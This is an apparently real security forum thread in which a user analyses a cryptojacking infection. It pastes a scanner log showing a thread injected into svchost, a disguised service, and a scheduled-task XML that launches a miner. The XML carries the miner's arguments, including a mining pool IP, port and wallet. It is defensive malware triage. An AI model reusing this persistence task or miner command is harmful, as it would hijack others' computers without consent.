safety 8 Posted December 4, 2023 Share Posted December 4, 2023 Dear Colleagues! Is it possible to decrypt a *.dat file paired with mobsync.dll/evntagnt.dll? Presumably this file may contain a config for the task, with the help of which the miner is launched from a folder with an arbitrary name For example: RescueSwift-fc4b811c-e35f-4a8d-a903-db85344b9d7f PicturePerfect-d2f4adbc-5e35-42fd-bfe5-bbdf187ada08 ExpressEditor-22b9dab3-7036-45b3-9fda-b264e8491726 BoltDownloader-e1648eb4-dcd2-4e6d-b19a-7fc96278e3b5 and others. The miner launch chain looks like this: (filmed via Universal Virus Sniffer) Полное имя C:\WINDOWS\SYSWOW64\SVCHOST.EXE Имя файла SVCHOST.EXE Тек. статус АКТИВНЫЙ ПРОВЕРЕННЫЙ сервис в автозапуске Фильтр Удовлетворяет критериям THREADS IN PROCESSES (ПРЕДУПРЕЖДЕНИЕ ~ ОБНАРУЖЕН ВНЕДРЕННЫЙ ПОТОК В ПРОЦЕССЕ)(1) [filtered (0)] Сохраненная информация на момент создания образа Статус АКТИВНЫЙ ПРОВЕРЕННЫЙ сервис в автозапуске Процесс 32-х битный File_Id 768582FAD000 Linker 14.20 Размер 46544 байт Создан 27.11.2023 в 13:19:16 Изменен 27.11.2023 в 13:19:16 TimeStamp 04.01.2033 в 14:21:46 EntryPoint + OS Version 10.0 Subsystem Windows graphical user interface (GUI) subsystem IMAGE_FILE_DLL - IMAGE_FILE_EXECUTABLE_IMAGE + Тип файла 32-х битный ИСПОЛНЯЕМЫЙ Цифр. подпись Действительна, подписано Microsoft Windows Publisher Оригинальное имя svchost.exe.mui Версия файла 10.0.19041.1 (WinBuild.160101.0800) Описание Хост-процесс для служб Windows Производитель Microsoft Corporation Доп. информация на момент обновления списка pid = 4092 NT AUTHORITY\СИСТЕМА CmdLine C:\Windows\SysWOW64\svchost.exe -k DcomLaunch -s EvntAgntSvc_daa0aa Процесс создан 13:01:43 [2023.12.03] С момента создания 00:01:21 CPU 0,09% CPU (1 core) 1,10% parentid = 948 C:\WINDOWS\SYSTEM32\SERVICES.EXE Предупреждение (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSWOW64\SVCHOST.EXE [4092], tid=5376 Создание задачи \Task-b4045877-4506-4217-974f-7ca9dc3da345_Vl pid = 4092 NT AUTHORITY\СИСТЕМА TaskXML <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <URI>\Task-b4045877-4506-4217-974f-7ca9dc3da345_Vl</URI> </RegistrationInfo> <Triggers> <RegistrationTrigger id="Trigger1"> <EndBoundary>2023-12-03T13:02:54</EndBoundary> <Enabled>true</Enabled> <Delay>PT25S</Delay> </RegistrationTrigger> </Triggers> <Principals> <Principal id="Author"> <UserId>S-1-5-21-3326377353-2303841640-77764357-1003</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a\TileDataNetwork.exe</Command> <Arguments>--create --algo 144_5 --pers BgoldPoW -i 99 --server 185.180.230.136:8080 --user ARRLXmqTUQrpjcN7P7xnnx1K1gfHQbCTiJ.Zephyr -w 0</Arguments> </Exec> </Actions> </Task> Время 13:01:49 [2023.12.03] parentid = 948 C:\WINDOWS\SYSTEM32\SERVICES.EXE SHA1 53C010F3CC328D4764359DA02D209750E4616BB4 MD5 BBFF42F3C7E8FC0E3049F6F88FBB88E2 Ссылки на объект Ссылка HKLM\System\CurrentControlSet\Services\EvntAgntSvc_daa0aa\ImagePath ImagePath %SystemRoot%\SysWOW64\svchost.exe -k DcomLaunch DisplayName EvntAgnt_999b80 Description Event Translator SNMP subagent EvntAgntSvc_daa0aa тип запуска: Авто (2) Изменен 27.11.2023 в 12:21:35 Образы EXE и DLL SVCHOST.EXE C:\WINDOWS\SYSWOW64 Загруженные DLL НЕИЗВЕСТНЫЕ EVNTAGNT.DLL C:\WINDOWS\SYSWOW64 -------------------- Here is the task TaskXML <?xml version="1.0" encoding="UTF-16"?> created after service starts C:\Windows\SysWOW64\svchost.exe -k DcomLaunch -s EvntAgntSvc_daa0aa Presumably, this is the task that is extracted from the *.dat file After creating the task, the miner is launched from the preinstalled folder, in this case from C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a execution block: <Exec> <Command>C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a\TileDataNetwork.exe</Command> <Arguments>--create --algo 144_5 --pers BgoldPoW -i 99 --server 185.180.230.136:8080 --user ARRLXmqTUQrpjcN7P7xnnx1K1gfHQbCTiJ.Zephyr -w 0</Arguments> </Exec> There are three different pairs in the archives, collected from different cases. archive password - "infected" (without quotes) Samples.rar Link to comment Share on other sites More sharing options...
Administrators Marcos 5,085 Posted December 4, 2023 Administrators Share Posted December 4, 2023 This forum is not intended for reporting suspicious samples. Please submit them as per the instructions at https://support.eset.com/en/kb141 and include information why you think they are malicious. I've scanned one of the dlls and it has zero detections at VirusTotal: https://www.virustotal.com/gui/file/4b8c5f3064f6e084ed1563886b1aa3f3898b1bf51718ab3913967ccfbf6c7c00?nocache=1 Link to comment Share on other sites More sharing options...
safety 8 Posted December 4, 2023 Author Share Posted December 4, 2023 Dear Marcos, The fact of the matter is that nothing is detected. However, through this service, a malicious thread is injected into syswow64\svchost.exe and the folder with the miner is restored. If it was deleted, restoration occurs with a different name. Okay, I'll send the files to Virlab. Link to comment Share on other sites More sharing options...
Recommended Posts